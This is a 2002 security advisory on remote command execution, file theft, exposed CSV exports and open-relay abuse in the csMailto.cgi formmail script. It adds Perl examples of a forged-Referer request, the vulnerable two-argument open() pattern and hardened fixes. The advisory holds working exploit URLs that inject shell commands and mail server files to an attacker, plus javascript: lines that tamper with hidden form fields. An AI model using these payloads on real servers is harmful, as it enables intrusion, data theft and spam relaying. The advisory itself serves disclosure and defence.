Name : CGIscript.net - csMailto.cgi - Remote Command Execution
Date : April 23, 2002
Product : csMailto
Vuln Type : Access Validation Error
Severity : HIGH RISK
Vendor : WWW.CGIscript.NET, LLC.
Homepage : http://www.cgiscript.net/
csMailto is a Perl CGI formmail script developed by
Mike Barone and Andy Angrick of CGIscript.net. From
the website: "(csMailto is) an automated script that
allows the user to build and manage multiple mailto
forms to use within your web site. Build your own
mailto forms without having to learn Perl. It also can
send and receive files!"
The script stores all its configuration data in hidden
form fields, relying on the user to accurately (and
honestly) echo that information back with each form
submission. The only thing preventing a user from
having complete control over the script is a Referer
check, which is easily bypassed.

Because of this and other problems, the script is
subject to the following attacks:

execute commands / read files (referer check bypassed)

Because the script stores all the form configuration
data in hidden fields in the actual form, once a user
can bypass the Referer check they can do essentially
anything an administrator of the program could do,
plus some additional things that probably weren't
intended.
The script doesn't even check for the full Referer;
it only checks for the presence of the server hostname
somewhere in the Referer you send. For example, if the
script is http://host.com/cgi-script/CSMailto/CSMailto.cgi
then it will look for the substring "host.com" in the
Referer, and any Referer containing that substring
passes, whatever the rest of it looks like. A Referer
is supplied by the client and proves nothing about
where a request came from, so it is not an access
control to begin with.

This method is inherently insecure and can be bypassed
by:

- Creating a Perl LWP script which specifies an
  arbitrary Referer.
- Using JavaScript or other means to modify the form
  values on the generated CSMailto form and allowing
  the browser to send the original (and valid) URL as
  the Referer.
- Creating a local form page with the target hostname
  in the path, and thus in the Referer that is sent
  when the form is submitted (eg: C:\html\host.com\form.html).
- Creating a local HTML page with a simple link (see
  below) and the target hostname in the path, and thus
  in the Referer that is sent when the link is clicked
  (eg: C:\html\host.com.html).

The last two methods depend on the browser sending a
Referer for a page loaded from the local disk, which
browsers of the time did; current browsers send no
Referer from file: URLs, so today only the first two
methods apply.
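An added example, not code from this advisory or from CGIscript.net: a Perl reconstruction of the kind of substring check described above (assumed, since csMailto's source is not reproduced here) run over several constructed Referer values, followed by the first bypass method, an LWP request carrying a forged Referer. The target URL reuses the example path above; the field names command, formname and Email appear elsewhere in this advisory, but their values here are made up.

```perl
#!/usr/bin/perl
# Added example, not csMailto's code.
# 1) an assumed reconstruction of the "is the server hostname a substring
#    of the Referer?" check the advisory describes;
# 2) a forged request built with LWP (bypass method 1 above).
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

# Assumed behaviour of the check: substring match on the hostname only.
sub referer_ok {
    my ($referer, $server_host) = @_;
    return (defined $referer && index($referer, $server_host) >= 0) ? 1 : 0;
}

# Constructed Referer values. Every one contains "host.com" and so every one
# is accepted, although only the first actually comes from the site's form.
my $host = 'host.com';
my @referers = (
    'http://host.com/forms/contact.html',           # the legitimate form
    'http://attacker.example/host.com/form.html',   # hostname in the path
    'http://host.com.attacker.example/',            # hostname as a DNS label
    'file:///C:/html/host.com/form.html',           # local copy of the form
);
for my $r (@referers) {
    printf "%-45s %s\n", $r, referer_ok($r, $host) ? 'accepted' : 'rejected';
}

# Bypass method 1: an LWP client sets whatever Referer it likes. The target
# URL is the advisory's example path (assumed to exist). The request is only
# built and printed, and sent only when --send is given, so this runs offline.
my $target = 'http://host.com/cgi-script/CSMailto/CSMailto.cgi';
my $req = POST $target,
    Referer => "http://$host/forms/contact.html",   # forged, but passes
    Content => [
        command  => 'mailform',
        formname => 'contact',            # assumed form name
        Email    => 'user@example.com',   # assumed reply address
    ];
print "\n", $req->as_string;

if (@ARGV && $ARGV[0] eq '--send') {
    my $ua  = LWP::UserAgent->new(timeout => 10);
    my $res = $ua->request($req);
    print $res->status_line, "\n";
}
```

Run without arguments it prints the verdict for each constructed Referer and the full request that would be sent; the point is that nothing in the request distinguishes the forged Referer from a real one.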
Some example exploits follow. Note that these all
assume the Referer check was bypassed with one of the
above methods. csMailto's source is not reproduced
here, but the shape of the first two payloads, a
command followed by '|', is the one that triggers
Perl's two-argument open(): a "filename" ending in '|'
is run as a shell command and its output is read in
place of a file. The first URL runs the command; the
second runs it and, through the autoresponse, mails the
output to the attacker; the third mails the attacker an
arbitrary file from the server.

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&[email protected]&form-autoresponse=YES&command=mailform
CSMailto.cgi?form-attachment=FILEPATH_HERE&[email protected]&form-autoresponse=YES&command=mailform
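The following is an added Perl example, not csMailto's code, reconstructing the open() pattern behind the payloads above on the assumption that the script opens the form-attachment value with two-argument open(), next to a hardened version of the same read. The attachment directory name and the file names are constructed; the injected command is a harmless echo.

```perl
#!/usr/bin/perl
# Added example, not csMailto's code. Assumed: the attachment named by the
# form-attachment field is opened with two-argument open().
use strict;
use warnings;
use File::Basename qw(basename);

# Vulnerable pattern: two-argument open() lets the "filename" carry the
# mode. "cmd |" means "run cmd and read its output"; "/etc/passwd" means
# "read that file, wherever it is". Both come straight from the form field.
sub read_attachment_unsafe {
    my ($name) = @_;
    open(ATTACH, $name) or return undef;   # $name decides what open() does
    local $/;                              # slurp
    my $data = <ATTACH>;
    close ATTACH;
    return $data;
}

# Hardened: three-argument open() with an explicit '<' mode can never start
# a pipe; the name is reduced to a basename so it cannot leave the
# attachment directory, and is checked against a strict character set.
my $ATTACH_DIR = 'attachments';            # assumed location
sub read_attachment_safe {
    my ($name) = @_;
    my $base = basename($name);
    return undef unless $base =~ /\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/;
    my $path = "$ATTACH_DIR/$base";
    open(my $fh, '<', $path) or return undef;   # mode is fixed by the code
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Constructed inputs: the advisory's payload shape with a harmless command,
# a traversal attempt, and an ordinary file name. The unsafe read really
# runs "echo injected" and, depending on the working directory, may really
# read /etc/passwd; the safe read returns undef for both.
for my $name ('echo injected|', '../../../etc/passwd', 'brochure.pdf') {
    my $u = read_attachment_unsafe($name);
    my $s = read_attachment_safe($name);
    (my $preview = defined $u ? substr($u, 0, 16) : 'undef') =~ s/\n/\\n/g;
    printf "%-22s unsafe: %-18s safe: %s\n", $name, $preview,
        defined $s ? length($s) . ' bytes' : 'undef';
}
```

The safe version also refuses names with '|', spaces or path separators outright rather than trying to strip them, which is the check a form handler that accepts file names from hidden fields needs regardless of any Referer test.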
download/access form input (no referer check)

CSMailto has the option to "have the feedback
exported to an external file". These files
are stored in CSV format and can be downloaded from:

CSMailto/export/FORM_NAME.csv

Nothing restricts access to that directory, so anyone
who can guess a form name can read every submission;
the export directory belongs outside the document root
or behind a deny rule. Form HTML files are often named
after their form names, and the form name is also
stored in a hidden field in the actual form, like so:
"...formname=FORM_NAME...". Also, it's worth noting
that the script doesn't properly escape '"', ',' or
newline ("\n") characters, so any CSV data containing
them may get corrupted, and a submitted field can
change where a row appears to end.
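An added example, not csMailto's code: the three troublesome characters above run through an unescaped comma join (assumed to be how the export is written, based on the corruption described) and through proper CSV quoting, with a minimal RFC 4180 reader to show how each version reads back. The submission is constructed.

```perl
#!/usr/bin/perl
# Added example, not csMailto's code. Assumed: the export joins submitted
# fields with "," as-is, consistent with '"', ',' and "\n" not being escaped.
use strict;
use warnings;

# The naive writer: fields joined with "," and a newline.
sub csv_row_naive { return join(',', @_) . "\n"; }

# A correct writer (RFC 4180 style): quote any field containing a quote,
# comma, CR or LF, and double the embedded quotes.
sub csv_field {
    my ($v) = @_;
    $v = '' unless defined $v;
    if ($v =~ /[",\r\n]/) {
        $v =~ s/"/""/g;
        return qq("$v");
    }
    return $v;
}
sub csv_row { return join(',', map { csv_field($_) } @_) . "\n"; }

# Minimal RFC 4180 reader: returns the records as array refs.
sub csv_parse {
    my ($text) = @_;
    my (@records, @fields);
    my ($field, $quoted) = ('', 0);
    my @c = split //, $text;
    for (my $i = 0; $i < @c; $i++) {
        my $ch = $c[$i];
        if ($quoted) {
            if ($ch eq '"') {
                if ($i + 1 < @c && $c[$i + 1] eq '"') { $field .= '"'; $i++ }
                else                                    { $quoted = 0 }
            } else { $field .= $ch }
        }
        elsif ($ch eq '"' && $field eq '') { $quoted = 1 }
        elsif ($ch eq ',')  { push @fields, $field; $field = '' }
        elsif ($ch eq "\n") {
            push @fields, $field; $field = '';
            push @records, [@fields]; @fields = ();
        }
        else { $field .= $ch }
    }
    push @records, [@fields, $field] if @fields || length $field;
    return @records;
}

# Constructed submission containing all three troublesome characters.
my @submission = ('Jane "JD" Doe', 'jane@example.com', "Hello,\nplease call");

for my $writer (['naive', \&csv_row_naive], ['quoted', \&csv_row]) {
    my ($label, $fn) = @$writer;
    my $text    = $fn->(@submission);
    my @records = csv_parse($text);
    printf "%-6s -> %d record(s): %s\n", $label, scalar @records,
        join(' | ', map { scalar(@$_) . ' field(s)' } @records);
}
```

The naive row reads back as two records, the newline ending the first one early and the embedded comma adding a field; the quoted row reads back as one record of three fields with the original values intact.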
use form to send email to anyone

Because the sender, recipient, subject and body all
come from (hidden) form fields, anyone who can submit
the form chooses all of them, which turns the script
into an open mail relay:

[email protected]&[email protected]&form-subject=subject&form-results=body&command=mailform
Another example of the seriousness of this problem: as
mentioned above, you can simply load an existing
CSMailto form, have your browser (IE in this example)
change some of the preset hidden form values, and then
click submit. Typed into the address bar one at a time,
the following set the attachment to a file path on the
server, turn on the autoresponse so that the file is
mailed back, and point the autoresponse address at the
attacker. The alert() wrapper only keeps the
expression's value from replacing the page, as a
javascript: URL that evaluates to a string would
otherwise do. Example:

javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
javascript:alert(document.forms[0]["Email"].value="[email protected]");

Current browsers strip "javascript:" from text pasted
into the address bar; the same edit is made today from
the developer tools console, or with a proxy that
rewrites the request.
Because of the large number of sites using
CGIscript.net scripts (over 17,000 csSearch users
alone, according to the website), and because search
engines can easily be used to identify sites by the
unique "csMailto.cgi" script name, the risk posed by
these flaws is very high indeed.
Vendor was notified on Apr 5, 2002 of the problem but
has not yet released a fix.
Until a fix is available, the only reliable mitigation
is to remove the script, or to deny web access to
CSMailto.cgi and to the export directory; the Referer
check cannot be relied on. Affected parties may want to
consider switching to a free replacement such as
"nms formmail", which can be found at
http://nms-cgi.sourceforge.net/scripts.shtml
April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432
March 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.
If anyone has any other CGIscript.net scripts they'd
like me to take a look at, just drop me a line at
[email protected].